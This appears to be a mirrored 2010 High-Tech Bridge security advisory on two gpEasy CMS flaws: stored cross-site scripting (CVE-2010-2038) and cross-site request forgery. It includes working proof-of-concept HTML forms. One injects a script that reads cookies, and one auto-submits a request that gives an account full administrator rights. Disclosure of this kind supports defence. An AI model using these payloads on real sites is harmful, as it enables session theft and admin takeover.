Lucene search

K
htbridgeHigh-Tech BridgeHTB22370
HistoryMay 05, 2010 - 12:00 a.m.

Multiple Vulnerabilities in gpEasy CMS

2010-05-0500:00:00
High-Tech Bridge
www.htbridge.com
15

2.1 Low

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:H/Au:S/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

50.9%

High-Tech Bridge SA Security Research Lab has discovered two vulnerabilities in gpEasy CMS which could be exploited to perform cross-site scripting and cross-sire request forgery attacks.

  1. Cross-site scripting vulnerability in gpEasy CMS: CVE-2010-2038
    The vulnerability exists due to input sanitation error in the HTTP POST parameter " gpcontent" in include/tool/editing_files.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
    Exploitation example:
    <form method=“POST” action=“http://example.com/index.php/Home” name=“myfrm”>
    <input type=“hidden” name=“cmd” value=‘save’>
    <input type=“hidden” name=“gpcontent” value=‘text"><script>alert(document.cookie)</script>’>
    </form>
    <script>
    d ocument.myfrm.submit();</script>

  2. Cross-site request forgery (CSRF) gpEasy CMS
    The vulnerability exists due to insufficient validation of the request origin in include/admin/admin_users.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and create account with arbitrary privileges within application. Successful exploitation might result in complete compromise of the application.
    Exploitation example:
    <form action=“http://example.com/index.php/Admin_Users” method=“post” name=“myfrm”>
    <input type=“hidden” name=“cmd” value=“ResetDetails” >
    <input type=“hidden” name=“username” value=“editor” >
    <input type=“hidden” name=“email” value="[email protected]" >
    <input type=“hidden” name=“grant[]” value=“Admin_Menu” >
    <input type=“hidden” name=“grant[]” value=“Admin_Uploaded” >
    <input type=“hidden” name=“grant[]” value=“Admin_Extra” >
    <input type=“hidden” name=“grant[]” value=“Admin_Theme” >
    <input type=“hidden” name=“grant[]” value=“Admin_Users” >
    <input type=“hidden” name=“grant[]” value=“Admin_Configuration” >
    <input type=“hidden” name=“grant[]” value=“Admin_Trash” >
    <input type=“hidden” name=“grant[]” value=“Admin_Uninstall” >
    <input type=“hidden” name=“grant[]” value=“Admin_Addons” >
    <input type=“hidden” name=“grant[]” value=“Admin_New” >
    <input type=“hidden” name=“grant[]” value=“Admin_Theme_Content” >
    <input type=“hidden” name=“aaa” value=“Continue” >
    </form>
    <script>
    document.myfrm.submit();
    </script>

CPENameOperatorVersion
gpeasy cmsle1.6.2

2.1 Low

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:H/Au:S/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

50.9%

Related for HTB22370